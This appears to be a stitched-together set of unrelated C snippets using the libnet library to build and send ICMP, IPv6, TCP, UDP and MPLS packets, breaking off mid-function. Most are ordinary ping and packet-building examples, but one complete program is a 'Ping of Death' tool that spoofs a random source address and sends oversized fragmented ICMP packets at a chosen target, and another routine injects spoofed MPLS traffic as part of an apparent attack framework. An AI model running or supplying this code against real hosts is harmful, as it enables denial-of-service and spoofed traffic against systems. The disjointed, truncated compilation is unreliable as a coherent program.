uint16_t buildICMP_h(libnet_t *l, uint32_t dip, uint8_t *PAYLOAD)
{
uint16_t seqn, id, bytes_w;
libnet_seed_prand(l);
id= (uint16_t)libnet_get_prand(LIBNET_PR16);
seqn =1;
icmp_t = libnet_build_icmpv4_echo(ICMP_ECHO,
0, 0, id, seqn, PAYLOAD, PAYLOAD_L, l, icmp_t);
if(icmp_t == -1)
{
fprintf(stderr,"libnet_build_ethernet() failed: %s\n",errbuf);
goto bad;
}
ip_t = libnet_autobuild_ipv4(
LIBNET_IPV4_H+LIBNET_ICMPV4_ECHO_H+PAYLOAD_L,
IPPROTO_ICMP, dip,l);
if(ip_t == -1)
{
fprintf(stderr,"libnet_autobuild_ipv4() failed: %s\n",errbuf);
goto bad;
}
bytes_w = libnet_write(l);
if(bytes_w == -1)
{
fprintf(stderr,"libnet_write() failed: %s\n",errbuf);
goto bad;
}
return 1;
bad:
return -1;
}
int
PyProtocol_injectICMP(PyObject *icmp_py, PyObject *payload_py, libnet_t *context)
{
ICMPObject *self = (ICMPObject *) icmp_py;
icmp_t *packet = (icmp_t *) PyString_AsString(self->data);
char *payload = NULL;
int payload_len = NULL;
libnet_ptag_t r;
PyString_AsStringAndSize(payload_py, &payload, &payload_len);
printf("Injecting ICMP packet\n");
switch (packet->icmp_type)
{
case ICMP_IREQ:
case ICMP_IREQREPLY:
case ICMP_ECHOREPLY:
case ICMP_ECHO:
r = libnet_build_icmpv4_echo(packet->icmp_type,
packet->icmp_code,
0,
ntohs(packet->icmp_id),
ntohs(packet->icmp_seq),
payload,
payload_len,
context,
0);
break;
case ICMP_TSTAMP:
case ICMP_TSTAMPREPLY:
r = libnet_build_icmpv4_timestamp(packet->icmp_type,
packet->icmp_code,
0,
packet->icmp_id,
packet->icmp_seq,
ntohl(packet->icmp_otime),
ntohl(packet->icmp_rtime),
ntohl(packet->icmp_ttime),
payload,
payload_len,
context,
0);
break;
case ICMP_REDIRECT:
// TODO: We don't currently disect the IP header in the
// body of the ICMP redirect packet.
default:
r = -1;
}
if (r == -1)
{
PyErr_SetString(ErrorObject, libnet_geterror(context));
return 0;
}
return 1;
}
int update_ISUM(libnet_t *l, libnet_ptag_t t)
{
int sum = 0;
unsigned int tmp;
if (tx.icmp_chksum != 0)
return 0;
sum += libnet_in_cksum((u_int16_t *) &tx.ip6_src, 16);
if (tx.ip_option_s && tx.ip6_segs)
sum += libnet_in_cksum((u_int16_t *) &tx.ip_option[tx.ip_option_s - 16], 16); // Use last IP address
else
sum += libnet_in_cksum((u_int16_t *) &tx.ip6_dst, 16);
tmp = htonl(LIBNET_ICMPV6_H + tx.icmp_payload_s);
sum += libnet_in_cksum((u_int16_t *) &tmp, 4);
tmp = htonl(IPPROTO_ICMP6);
sum += libnet_in_cksum((u_int16_t *) &tmp, 4);
tmp = htonl(((tx.icmp_type << 8) + tx.icmp_code));
sum += libnet_in_cksum((u_int16_t *) &tmp, 4);
if (tx.icmp_payload_s)
sum += libnet_in_cksum((u_int16_t *) tx.icmp_payload, tx.icmp_payload_s);
tx.icmp_chksum = ntohs(LIBNET_CKSUM_CARRY(sum));
t = libnet_build_icmpv4_echo (tx.icmp_type,
tx.icmp_code,
tx.icmp_chksum,
tx.icmp_ident,
tx.icmp_sqnr,
tx.icmp_payload_s ? tx.icmp_payload : NULL,
tx.icmp_payload_s,
l,
t);
return t;
}
int
main(int argc, char *argv[])
{
libnet_t *l;
int r;
char *device = "eth0";
struct libnet_ether_addr *mac_address;
struct in6_addr src_ip;
struct libnet_in6_addr dst_ip;
char errbuf[LIBNET_ERRBUF_SIZE];
libnet_ptag_t icmp_ptag = 0;
libnet_ptag_t ipv6_ptag = 0;
char payload[24] = { 0 };
memset(&src_ip, 0x66, sizeof(src_ip));
l = libnet_init( LIBNET_RAW6, device, errbuf);
assert(l);
mac_address = libnet_get_hwaddr(l);
assert(mac_address);
dst_ip = libnet_name2addr6(l, "::1" /* BCAST_ADDR - defined where? */, LIBNET_DONT_RESOLVE);
memcpy(payload,src_ip.s6_addr,16);
payload[16] = 2; /* 2 for Target Link-layer Address */
payload[17] = 1; /* The length of the option */
memcpy(payload+18,mac_address->ether_addr_octet, 6);
/* 0x2000: RSO */
icmp_ptag = libnet_build_icmpv4_echo(
136,0,0,0x2000,0,
(uint8_t *)payload,sizeof(payload), l, LIBNET_PTAG_INITIALIZER);
assert(icmp_ptag);
ipv6_ptag = libnet_build_ipv6(
0, 0,
LIBNET_ICMPV6_H + sizeof(payload), /* ICMPV6_H == ICMPV4_H, luckily */
IPPROTO_ICMP6,
255,
*(struct libnet_in6_addr*)&src_ip,
dst_ip,
NULL, 0,
l, 0);
assert(icmp_ptag);
print_pblocks(l);
{
uint8_t* pkt1 = NULL;
uint32_t pkt1_sz = 0;
r = libnet_pblock_coalesce(l, &pkt1, &pkt1_sz);
assert(r >= 0);
libnet_diag_dump_hex(pkt1, LIBNET_IPV6_H, 0, stdout);
libnet_diag_dump_hex(pkt1+LIBNET_IPV6_H, pkt1_sz-LIBNET_IPV6_H, 0, stdout);
free(pkt1);
pkt1 = NULL;
}
r = libnet_write(l);
assert(r >= 0);
return (EXIT_SUCCESS);
}
int main() {
libnet_t *l; /* libnet context */
char errbuf[LIBNET_ERRBUF_SIZE], ip_addr_str[16];
u_int32_t ip_addr;
u_int16_t id, seq;
int i;
l = libnet_init(LIBNET_RAW4, NULL, errbuf);
if ( l == NULL ) {
fprintf(stderr, "libnet_init() failed: %s\n", errbuf);
exit(EXIT_FAILURE);
}
/* Generating a random id */
libnet_seed_prand(l);
id = (u_int16_t)libnet_get_prand(LIBNET_PR16);
/* Getting destination IP address */
printf("Destination IP address: ");
scanf("%15s",ip_addr_str);
ip_addr = libnet_name2addr4(l, ip_addr_str, LIBNET_DONT_RESOLVE);
if ( ip_addr == -1 ) {
fprintf(stderr, "Error converting IP address.\n");
libnet_destroy(l);
exit(EXIT_FAILURE);
}
/* Writing 4 packets */
seq = 1;
for ( i = 0; i < 4; i++ ) {
/* Building the ICMP header */
if ( libnet_build_icmpv4_echo(ICMP_ECHO, 0, 0, id,\
(seq + i), NULL, 0, l, 0) == -1 ) {
fprintf(stderr, "Error building ICMP header: %s\n",\
libnet_geterror(l));
libnet_destroy(l);
exit(EXIT_FAILURE);
}
/* Building the IP header */
if ( libnet_autobuild_ipv4(LIBNET_IPV4_H + \
LIBNET_ICMPV4_ECHO_H, IPPROTO_ICMP,\
ip_addr, l) == -1 ) {
fprintf(stderr, "Error building IP header: %s\n",\
libnet_geterror(l));
libnet_destroy(l);
exit(EXIT_FAILURE);
}
if ( libnet_write(l) == -1 )
fprintf(stderr, "Error writing packet: %s\n",\
libnet_geterror(l));
/* Clearing the packet */
/* Comment this to see what happens when you rebuild headers
* without calling libnet_clear_packet() */
libnet_clear_packet(l);
/* Waiting 1 second between each packet */
sleep(1);
}
libnet_destroy(l);
return 0;
}
int main()
{
libnet_t *handle;
char errbuf[LIBNET_ERRBUF_SIZE],ip_addr_str[16];
u_int32_t ip_addr;
u_int16_t id,seq;
char payload[] = "libnet :D";
int bytes_written;
handle = libnet_init(LIBNET_RAW4,NULL,errbuf);
if(handle == NULL)
{
fprintf(stderr,"libnet_init() failed: %s\n",errbuf);
exit(EXIT_FAILURE);
}
libnet_seed_prand(handle);
id = (u_int16_t)libnet_get_prand(LIBNET_PR16);
printf("Destination IP address: ");
scanf("%15s",ip_addr_str);
ip_addr = libnet_name2addr4(handle,ip_addr_str,LIBNET_DONT_RESOLVE);
if(ip_addr == -1)
{
fprintf(stderr,"Error converting IP address.\n");
libnet_destroy(handle);
exit(EXIT_FAILURE);
}
seq = 1;
if(libnet_build_icmpv4_echo(ICMP_ECHO,0,0,id,seq,\
(u_int8_t *)payload,sizeof(payload),handle,0)==-1)
{
fprintf(stderr,"Error building ICMP header: %s\n",\
libnet_geterror(handle));
libnet_destroy(handle);
exit(EXIT_FAILURE);
}
if(libnet_autobuild_ipv4(LIBNET_IPV4_H + \
LIBNET_ICMPV4_ECHO_H + sizeof(payload),\
IPPROTO_ICMP,ip_addr,handle) == -1)
{
fprintf(stderr,"Error building IP header: %s\n",\
libnet_geterror(handle));
libnet_destroy(handle);
exit(EXIT_FAILURE);
}
bytes_written = libnet_write(handle);
if(bytes_written != -1)
printf("%d bytes written.\n",bytes_written);
else
fprintf(stderr,"Error writing packet: %s\n",\
libnet_geterror(handle));
libnet_destroy(handle);
return 0;
}
void frag_and_send(u_int8_t *payload, u_int32_t total_pload_size) {
/* Builds and sends the first packet, calling get_sum() to
* * get the correct checksum for the ICMP packet (with the
* * whole payload). Then builds and sends IP fragments
* * until all the payload is sent. */
char ip_addr_str[16];
u_int32_t ip_addr, src_addr;
u_int16_t id, seq, ip_id;
/* hdr_offset = fragmentation flags + offset (in bytes)
* * divided by 8 */
int pload_offset, hdr_offset;
int bytes_written, max_pload_size, packet_pload_size;
libnet_ptag_t ip_tag;
/* Generating random IDs */
id = (u_int16_t)libnet_get_prand(LIBNET_PR16);
/* We need a non-zero id number for the IP headers,
* * otherwise libnet will increase it after each
* * build_ipv4, breaking the fragments */
ip_id = (u_int16_t)libnet_get_prand(LIBNET_PR16);
seq = 1;
/* Getting IP addresses */
src_addr = libnet_get_ipaddr4(l);
if (src_addr == -1) {
fprintf(stderr, "Couldn't get own IP address: %s\n", libnet_geterror(l));
libnet_destroy(l);
exit(EXIT_FAILURE);
}
printf("Destination IP address: ");
scanf("%15s", ip_addr_str);
ip_addr = libnet_name2addr4(l, ip_addr_str, LIBNET_DONT_RESOLVE);
if (ip_addr == -1) {
fprintf(stderr, "Error converting IP address.\n");
libnet_destroy(l);
exit(EXIT_FAILURE);
}
/* Getting max payload size */
max_pload_size = (MTU - LIBNET_IPV4_H);
/* making it a multiple of 8 */
max_pload_size -= (max_pload_size % 8);
pload_offset = 0;
/* Building the first packet, which carries the ICMP
* * header */
/* We're doing (payload size - icmp header size) and not
* * checking if it's a multiple of 8 because we know the
* * header is 8 bytes long */
if (total_pload_size > (max_pload_size - LIBNET_ICMPV4_ECHO_H)) {
hdr_offset = IP_MF;
packet_pload_size = max_pload_size - LIBNET_ICMPV4_ECHO_H;
} else {
hdr_offset = 0;
packet_pload_size = total_pload_size;
}
/* ICMP header */
if (libnet_build_icmpv4_echo(ICMP_ECHO, 0,
get_sum(payload, total_pload_size, id, seq), id,
seq, payload, packet_pload_size, l, 0) == -1) {
fprintf(stderr, "Error building ICMP header: %s\n", libnet_geterror(l));
libnet_destroy(l);
exit(EXIT_FAILURE);
}
/* First IP header (no payload, offset == 0) */
if (libnet_build_ipv4(
(LIBNET_IPV4_H + LIBNET_ICMPV4_ECHO_H + packet_pload_size), 0, ip_id,
hdr_offset, 255, IPPROTO_ICMP, 0, src_addr, ip_addr, NULL, 0, l,
0) == -1) {
fprintf(stderr, "Error building IP header: %s\n", libnet_geterror(l));
libnet_destroy(l);
exit(EXIT_FAILURE);
}
/* Writing packet */
bytes_written = libnet_write(l);
if (bytes_written != -1)
printf("%d bytes written.\n", bytes_written);
else
fprintf(stderr, "Error writing packet: %s\n", libnet_geterror(l));
/* Updating the offset */
pload_offset += packet_pload_size;
/* Clearing */
/* We need to get rid of the ICMP header to build the
* * other fragments */
libnet_clear_packet(l);
ip_tag = LIBNET_PTAG_INITIALIZER;
/* Looping until all the payload is sent */
while (total_pload_size > pload_offset) {
/* Building IP header */
/* checking if there will be more fragments */
if ((total_pload_size - pload_offset) > max_pload_size) {
/* In IP's eyes, the ICMP header in the first packet
* needs to be in the offset, so we add its size to
* the payload offset here */
hdr_offset = IP_MF + (pload_offset + LIBNET_ICMPV4_ECHO_H) / 8;
packet_pload_size = max_pload_size;
} else {
/* See above */
hdr_offset = (pload_offset + LIBNET_ICMPV4_ECHO_H) / 8;
packet_pload_size = total_pload_size - pload_offset;
}
ip_tag = libnet_build_ipv4((LIBNET_IPV4_H + max_pload_size), 0, ip_id,
hdr_offset, 255, IPPROTO_ICMP, 0, src_addr,
ip_addr, (payload + pload_offset),
packet_pload_size, l, ip_tag);
if (ip_tag == -1) {
fprintf(stderr, "Error building IP header: %s\n", libnet_geterror(l));
libnet_destroy(l);
exit(EXIT_FAILURE);
}
/* Writing packet */
bytes_written = libnet_write(l);
if (bytes_written != -1)
printf("%d bytes written.\n", bytes_written);
else
fprintf(stderr, "Error writing packet: %s\n", libnet_geterror(l));
/* Updating the offset */
pload_offset += packet_pload_size;
}
}
u_int16_t get_sum(u_int8_t *payload, u_int32_t total_pload_size, u_int16_t id,
u_int16_t seq) {
/* Builds the ICMP header with the whole payload, gets
* the checksum from it and returns it (in host order). */
char errbuf[LIBNET_ERRBUF_SIZE];
libnet_ptag_t icmp_tag;
u_int8_t *packet;
u_int32_t packet_size;
u_int16_t *sum_p, sum;
u_int8_t dummy_dst[6] = {0, 0, 0, 0, 0, 0};
icmp_tag = LIBNET_PTAG_INITIALIZER;
/* Switching to advanced link mode */
/* Nothing should be built yet and all random numbers
* * should be already generated. */
libnet_destroy(l);
l = libnet_init(LIBNET_LINK_ADV, "eth0", errbuf);
if (l == NULL) {
fprintf(stderr, "libnet_init() failed (link_adv): %s\n", errbuf);
exit(EXIT_FAILURE);
}
/* Building the header */
icmp_tag = libnet_build_icmpv4_echo(ICMP_ECHO, 0, 0, id, seq, payload,
total_pload_size, l, icmp_tag);
if (icmp_tag == -1) {
fprintf(stderr, "Error building ICMP header: %s\n", libnet_geterror(l));
libnet_destroy(l);
exit(EXIT_FAILURE);
}
/* Building dummy IP header */
if (libnet_autobuild_ipv4(
(LIBNET_IPV4_H + LIBNET_ICMPV4_ECHO_H + total_pload_size),
IPPROTO_ICMP, 0, l) == -1) {
fprintf(stderr, "Error building dummy IP header: %s\n", libnet_geterror(l));
libnet_destroy(l);
exit(EXIT_FAILURE);
}
/* Building dummy Ethernet header */
if (libnet_autobuild_ethernet(dummy_dst, ETHERTYPE_IP, l) == -1) {
fprintf(stderr, "Error building dummy Ethernet header: %s\n",
libnet_geterror(l));
libnet_destroy(l);
exit(EXIT_FAILURE);
}
/* Pulling the packet */
if (libnet_adv_cull_packet(l, &packet, &packet_size) == -1) {
fprintf(stderr, "Error pulling the packet: %s\n", libnet_geterror(l));
libnet_destroy(l);
exit(EXIT_FAILURE);
}
/* Grabbing the checksum */
/* We want the 37th and 38th bytes: eth header (14) + ip
* * header (20) + icmp type and code (2) = 36 */
sum_p = (u_int16_t *)(packet + 36);
sum = ntohs(*sum_p);
/* Freeing memory */
libnet_adv_free_packet(l, packet);
/* Clearing the header */
libnet_clear_packet(l);
/* Switching back to IPv4 raw socket mode */
libnet_destroy(l);
l = libnet_init(LIBNET_RAW4, "eth0", errbuf);
if (l == NULL) {
fprintf(stderr, "libnet_init() failed (raw4, 2nd call): %s\n", errbuf);
exit(EXIT_FAILURE);
}
return sum;
}
int
main(int argc, char **argv)
{
struct libnet_in6_addr dst_ip;
struct libnet_in6_addr src_ip;
u_short dst_prt = 0;
u_short src_prt = 0;
libnet_t *l;
libnet_ptag_t t;
u_char *cp;
char errbuf[LIBNET_ERRBUF_SIZE];
int i, c, packet_amt, burst_int, burst_amt, build_ip;
char srcname[100],dstname[100];
packet_amt = 0;
burst_int = 0;
burst_amt = 1;
printf("libnet 1.1 echo request ICMP6[raw]\n");
/*
* Initialize the library. Root priviledges are required.
*/
l = libnet_init(
LIBNET_RAW6, /* injection type */
NULL, /* network interface */
errbuf); /* error buffer */
if (l == NULL)
{
fprintf(stderr, "libnet_init() failed: %s", errbuf);
exit(EXIT_FAILURE);
}
while((c = getopt(argc, argv, "t:a:i:b:")) != EOF)
{
switch (c)
{
case 't':
if (!(cp = strrchr(optarg, '/')))
{
usage(argv[0]);
exit(EXIT_FAILURE);
}
*cp++ = 0;
dst_prt = (u_short)atoi(cp);
dst_ip = libnet_name2addr6(l, optarg, 1);
if (strncmp((char*)&dst_ip,(char*)&in6addr_error,sizeof(in6addr_error))==0)
{
fprintf(stderr, "Bad IP6 address: %s\n", optarg);
exit(EXIT_FAILURE);
}
break;
case 'a':
packet_amt = atoi(optarg);
break;
case 'i':
burst_int = atoi(optarg);
break;
case 'b':
burst_amt = atoi(optarg);
break;
default:
usage(argv[0]);
exit(EXIT_FAILURE);
}
}
if (!dst_prt || strncmp((char*)&dst_ip,(char*)&in6addr_error,sizeof(in6addr_error))==0 || !packet_amt)
{
usage(argv[0]);
exit(EXIT_FAILURE);
}
libnet_seed_prand(l);
libnet_addr2name6_r(src_ip,1,srcname,sizeof(srcname));
libnet_addr2name6_r(dst_ip,1,dstname,sizeof(dstname));
for(t = LIBNET_PTAG_INITIALIZER, build_ip = 1; burst_amt--;)
{
for (i = 0; i < packet_amt; i++)
{
char payload[56];
int i;
for (i=0; i<56; i++) payload[i]='A'+((char)(i%26));
t = libnet_build_icmpv4_echo(ICMP6_ECHO,0,0,1,0,payload,sizeof(payload),l,t);
if (build_ip)
{
build_ip = 0;
libnet_build_ipv6(0,0,
LIBNET_ICMPV6_H + sizeof(payload),
IPPROTO_ICMP6,
64,
src_ip,
dst_ip,
NULL,
0,
l,
0);
}
printf("%15s/%5d -> %15s/%5d\n",
srcname,
ntohs(src_prt),
dstname,
dst_prt);
c = libnet_write(l);
if (c == -1)
{
fprintf(stderr, "libnet_write: %s\n", libnet_geterror(l));
}
#if !(__WIN32__)
usleep(250);
#else
Sleep(250);
#endif
}
#if !(__WIN32__)
sleep(burst_int);
#else
Sleep(burst_int * 1000);
#endif
}
exit(EXIT_SUCCESS);
}
int
main(int argc, char **argv)
{
libnet_t *l;
libnet_ptag_t ip;
libnet_ptag_t icmp;
struct libnet_stats ls;
u_long fakesrc, target;
u_char *data;
int c, i, flags, offset, len;
char errbuf[LIBNET_ERRBUF_SIZE];
printf("libnet 1.1 Ping of Death[raw]\n");
/*
* Initialize the library. Root priviledges are required.
*/
l = libnet_init(
LIBNET_RAW4, /* injection type */
NULL, /* network interface */
errbuf); /* errbuf */
if (l == NULL)
{
fprintf(stderr, "libnet_init() failed: %s\n", errbuf);
exit(EXIT_FAILURE);
}
if (argc != 2 || ((target = libnet_name2addr4(l, argv[1], LIBNET_RESOLVE) == -1)))
{
fprintf(stderr, "Usage: %s <target>\n", argv[0]);
exit(EXIT_FAILURE);
}
/* get random src addr. */
libnet_seed_prand(l);
fakesrc = libnet_get_prand(LIBNET_PRu32);
data = malloc(FRAG_LEN);
for (i = 0 ; i < FRAG_LEN ; i++)
{
/* fill it with something */
data[i] = 0x3a;
}
ip = LIBNET_PTAG_INITIALIZER;
icmp = LIBNET_PTAG_INITIALIZER;
for (i = 0 ; i < 65536 ; i += (LIBNET_ICMPV4_ECHO_H + FRAG_LEN))
{
offset = i;
flags = 0;
if (offset < 65120)
{
flags = IP_MF;
len = FRAG_LEN;
}
else
{
/* for a total reconstructed length of 65538 bytes */
len = 410;
}
icmp = libnet_build_icmpv4_echo(
ICMP_ECHO, /* type */
0, /* code */
0, /* checksum */
666, /* id */
666, /* sequence */
data, /* payload */
len, /* payload size */
l, /* libnet handle */
icmp); /* libnet ptag */
if (icmp == -1)
{
fprintf(stderr, "Can't build ICMP header: %s\n", libnet_geterror(l));
goto bad;
}
/* no reason to do this */
libnet_toggle_checksum(l, icmp, 0);
ip = libnet_build_ipv4(
LIBNET_IPV4_H + LIBNET_ICMPV4_ECHO_H + len, /* length */
0, /* TOS */
666, /* IP ID */
flags | (offset >> 3), /* IP Frag */
64, /* TTL */
IPPROTO_ICMP, /* protocol */
0, /* checksum */
fakesrc, /* source IP */
target, /* destination IP */
NULL, /* payload */
0, /* payload size */
l, /* libnet handle */
ip); /* libnet ptag */
if (ip == -1)
{
fprintf(stderr, "Can't build IP header: %s\n", libnet_geterror(l));
goto bad;
}
c = libnet_write(l);
if (c == -1)
{
fprintf(stderr, "Write error: %s\n", libnet_geterror(l));
}
/* tcpdump-style jonks. */
printf("%s > %s: (frag 666:%d@%d%s)\n", libnet_addr2name4(fakesrc,0),
argv[1], LIBNET_ICMPV4_ECHO_H + len, offset, flags ? "+" : "");
}
libnet_stats(l, &ls);
fprintf(stderr, "Packets sent: %lld\n"
"Packet errors: %lld\n"
"Bytes written: %lld\n",
ls.packets_sent, ls.packet_errors, ls.bytes_written);
libnet_destroy(l);
free(data);
return (EXIT_SUCCESS);
bad:
libnet_destroy(l);
free(data);
return (EXIT_FAILURE);
}
int main() {
libnet_t *l; /* libnet context */
char errbuf[LIBNET_ERRBUF_SIZE], ip_addr_str[16];
u_int32_t ip_addr;
libnet_ptag_t icmp_tag, ip_tag;
u_int16_t id, seq;
int i;
l = libnet_init(LIBNET_RAW4, NULL, errbuf);
if ( l == NULL ) {
fprintf(stderr, "libnet_init() failed: %s\n", errbuf);
exit(EXIT_FAILURE);
}
icmp_tag = ip_tag = LIBNET_PTAG_INITIALIZER;
/* Generating a random id */
libnet_seed_prand(l);
id = (u_int16_t)libnet_get_prand(LIBNET_PR16);
/* Getting destination IP address */
printf("Destination IP address: ");
scanf("%15s",ip_addr_str);
ip_addr = libnet_name2addr4(l, ip_addr_str, LIBNET_DONT_RESOLVE);
if ( ip_addr == -1 ) {
fprintf(stderr, "Error converting IP address.\n");
libnet_destroy(l);
exit(EXIT_FAILURE);
}
/* Building ICMP header */
seq = 1;
icmp_tag = libnet_build_icmpv4_echo(ICMP_ECHO, 0, 0, id, seq, NULL,\
0, l, 0);
if (icmp_tag == -1) {
fprintf(stderr, "Error building ICMP header: %s\n",\
libnet_geterror(l));
libnet_destroy(l);
exit(EXIT_FAILURE);
}
/* Building IP header */
ip_tag = libnet_autobuild_ipv4(LIBNET_IPV4_H + LIBNET_ICMPV4_ECHO_H,\
IPPROTO_ICMP, ip_addr, l);
if (ip_tag == -1) {
fprintf(stderr, "Error building IP header: %s\n",\
libnet_geterror(l));
libnet_destroy(l);
exit(EXIT_FAILURE);
}
/* Writing 4 packets */
for ( i = 0; i < 4; i++ ) {
/* Updating the ICMP header */
icmp_tag = libnet_build_icmpv4_echo(ICMP_ECHO, 0, 0, id,\
(seq + i), NULL, 0, l, icmp_tag);
if (icmp_tag == -1) {
fprintf(stderr, "Error building ICMP header: %s\n",\
libnet_geterror(l));
libnet_destroy(l);
exit(EXIT_FAILURE);
}
if ( libnet_write(l) == -1 )
fprintf(stderr, "Error writing packet: %s\n",\
libnet_geterror(l));
/* Waiting 1 second between each packet */
sleep(1);
}
libnet_destroy(l);
return 0;
}
void
mpls_send(struct attacks *attacks)
{
sigset_t mask;
struct mpls_data *mpls_data;
libnet_ptag_t t;
libnet_t *lhandler;
int32_t sent;
int32_t payload_size=0, packet_size=0;
u_int8_t *payload=NULL;
dlist_t *p;
struct interface_data *iface_data;
struct interface_data *iface_data2;
pthread_mutex_lock(&attacks->attack_th.finished);
pthread_detach(pthread_self());
mpls_data = attacks->data;
sigfillset(&mask);
if (pthread_sigmask(SIG_BLOCK, &mask, NULL))
{
thread_error("mpls_send pthread_sigmask()",errno);
return;
}
if (mpls_data->ip_payload && mpls_data->ip_payload[0])
{
payload_size = strlen((const char *)mpls_data->ip_payload);
payload = mpls_data->ip_payload;
}
for (p = attacks->used_ints->list; p; p = dlist_next(attacks->used_ints->list, p))
{
iface_data = (struct interface_data *) dlist_data(p);
lhandler = iface_data->libnet_handler;
switch(mpls_data->proto)
{
case IPPROTO_TCP:
packet_size = LIBNET_TCP_H + payload_size;
t = libnet_build_tcp(
mpls_data->src_port, /* source port */
mpls_data->dst_port, /* destination port */
0x666, /* sequence number */
0x00000000, /* acknowledgement num */
TH_SYN, /* control flags */
32767, /* window size */
0, /* checksum */
0, /* urgent pointer */
packet_size, /* TCP packet size */
payload, /* payload */
payload_size, /* payload size */
lhandler, /* libnet handle */
0); /* libnet id */
break;
case IPPROTO_UDP:
packet_size = LIBNET_UDP_H + payload_size;
t = libnet_build_udp(
mpls_data->src_port, /* source port */
mpls_data->dst_port, /* destination port */
packet_size, /* UDP packet size */
0, /* checksum */
payload, /* payload */
payload_size, /* payload size */
lhandler, /* libnet handle */
0); /* libnet id */
break;
case IPPROTO_ICMP:
packet_size = LIBNET_ICMPV4_ECHO_H + payload_size;
t = libnet_build_icmpv4_echo(
ICMP_ECHO, /* type */
0, /* code */
0, /* checksum */
0x42, /* id */
0x42, /* sequence number */
payload, /* payload */
payload_size, /* payload size */
lhandler, /* libnet handle */
0);
break;
}
if (t == -1)
{
thread_libnet_error("Can't build tcp/udp/icmp header",lhandler);
libnet_clear_packet(lhandler);
return;
}
t = libnet_build_ipv4(
LIBNET_IPV4_H + packet_size, /* length */
0, /* TOS */
242, /* IP ID */
0, /* IP Frag */
128, /* TTL */
mpls_data->proto, /* protocol */
0, /* checksum */
htonl(mpls_data->src_ip), /* source IP */
htonl(mpls_data->dst_ip), /* destination IP */
NULL, /* payload */
0, /* payload size */
lhandler, /* libnet handle */
0); /* libnet id */
if (t == -1)
{
thread_libnet_error("Can't build IP header",lhandler);
libnet_clear_packet(lhandler);
return;
}
t = libnet_build_mpls(
mpls_data->label1, /* label */
mpls_data->exp1, /* experimental */
LIBNET_MPLS_BOS_ON, /* bottom of stack */
mpls_data->ttl1, /* ttl */
NULL, /* payload */
0, /* payload size */
lhandler, /* libnet handle */
0); /* libnet id */
if (t == -1)
{
thread_libnet_error("Can't build MPLS header",lhandler);
libnet_clear_packet(lhandler);
return;
}
if (mpls_data->double_hdr)
{
t = libnet_build_mpls(
mpls_data->label2, /* label */
mpls_data->exp2, /* experimental */
LIBNET_MPLS_BOS_OFF, /* bottom of stack */
mpls_data->ttl2, /* ttl */
NULL, /* payload */
0, /* payload size */
lhandler, /* libnet handle */
0); /* libnet id */
if (t == -1)
{
thread_libnet_error("Can't build MPLS header",lhandler);
libnet_clear_packet(lhandler);
return;
}
}
t = libnet_build_ethernet(
mpls_data->mac_dest, /* ethernet destination */
mpls_data->mac_source, /* ethernet source */
ETHERTYPE_MPLS, /* protocol type */
NULL, /* payload */
0, /* payload size */
lhandler, /* libnet handle */
0); /* libnet id */
if (t == -1)
{
thread_libnet_error("Can't build Ethernet header",lhandler);
libnet_clear_packet(lhandler);
return;
}
/*
* Write it to the wire.
*/
sent = libnet_write(lhandler);
if (sent == -1)
{
thread_libnet_error("libnet_write error", lhandler);
libnet_clear_packet(lhandler);
return;
}
libnet_clear_packet(lhandler);
protocols[PROTO_MPLS].packets_out++;
iface_data2 = interfaces_get_struct(iface_data->ifname);
iface_data2->packets_out[PROTO_MPLS]++;
}
}
int libnet_gen_l4_packet( struct packet_desc *packet_vars, libnet_t *l ) {
libnet_ptag_t t;
char *payload;
u_short payload_s;
u_long src_ip, dst_ip;
u_short src_prt, dst_prt;
u_short options = 0;
if (packet_vars->l4_pkt_type == 0) {
/* NO L4 Processing*/
return(1);
}
if ((packet_vars->l3_pkt_type == 0) || (packet_vars->l2_pkt_type == 0)) {
printf(" TEST PROGRAM ERROR !! \n");
return(-1);
}
#if 0
if( /*TCP_OPTIONS*/) {
// Add code here
}
#endif
payload = genPayload(packet_vars->payload.data_type,
packet_vars->payload.data_seed,packet_vars->l4_len);
payload_s = packet_vars->l4_len;
if (packet_vars->l4_pkt_type & L4_PKT_TYPE_TCP) {
printf(" Building TCP Packet!! \n");
t = libnet_build_tcp(
packet_vars->tcp.src_port, /* source port */
packet_vars->tcp.dst_port, /* destination port */
packet_vars->tcp.seq_no, /* sequence number */
packet_vars->tcp.ack_no, /* acknowledgement num */
packet_vars->tcp.tcp_flags, /* control flags */
0, /* window size */
packet_vars->tcp.checksum, /* checksum */
0, /* urgent pointer */
LIBNET_TCP_H + options + payload_s, /* TCP packet size */
payload, /* payload */
payload_s, /* payload size */
l, /* libnet handle */
0); /* libnet id */
if (t == -1)
{
fprintf(stderr, "Can't build TCP header: %s\n", libnet_geterror(l));
return(-1);
}
} else if (packet_vars->l4_pkt_type & L4_PKT_TYPE_UDP) {
printf(" Building UDP Packet!! \n");
t = libnet_build_udp(
packet_vars->udp.src_port, /* source port */
packet_vars->udp.dst_port , /* destination port */
LIBNET_UDP_H + payload_s, /* packet length */
packet_vars->udp.checksum, /* checksum */
payload, /* payload */
payload_s, /* payload size */
l, /* libnet handle */
0); /* libnet id */
if (t == -1)
{
fprintf(stderr, "Can't build UDP header: %s\n", libnet_geterror(l));
return(-1);
}
} else if (packet_vars->l4_pkt_type & L4_PKT_TYPE_AH) {
printf(" Building AH Packet!! \n");
packet_vars->ipsec_ah.nh = 0;
packet_vars->ipsec_ah.len =
packet_vars->ipsec_ah.res = 0;
packet_vars->ipsec_ah.auth = 0xa5a5a5a5;
t = libnet_build_ipsec_ah(
packet_vars->ipsec_ah.nh,
packet_vars->ipsec_ah.len,
packet_vars->ipsec_ah.res,
packet_vars->ipsec_ah.spi,
packet_vars->ipsec_ah.seq,
packet_vars->ipsec_ah.auth,
payload,
payload_s,
l,
0);
if (t == -1)
{
fprintf(stderr, "Can't build IPSEC_AH header: %s\n",
libnet_geterror(l));
return(-1);
}
} else if (packet_vars->l4_pkt_type & L4_PKT_TYPE_ESP) {
printf(" Building ESP Packet!! \n");
t = libnet_build_ipsec_esp_hdr(
packet_vars->ipsec_ah.spi,
packet_vars->ipsec_ah.seq,
0xa5a5a5a5, // TMP - not sure what can be used here
payload,
payload_s,
l,
0);
if (t == -1) {
fprintf(stderr, "Can't build IPSEC_ESP header: %s\n",
libnet_geterror(l));
return(-1);
}
} else if (packet_vars->l4_pkt_type & L4_PKT_TYPE_SCTP) {
printf("---Building SCTP packet\n");
t = libnet_build_sctp(
packet_vars->sctp.src_port, /* source port */
packet_vars->sctp.dst_port, /* dest port */
packet_vars->sctp.vtag, /* verification tag */
packet_vars->sctp.checksum, /* checksum */
payload, /* payload */
payload_s, /* payload size */
l, /* libnet handle */
0); /* libnet id */
if (t == -1) {
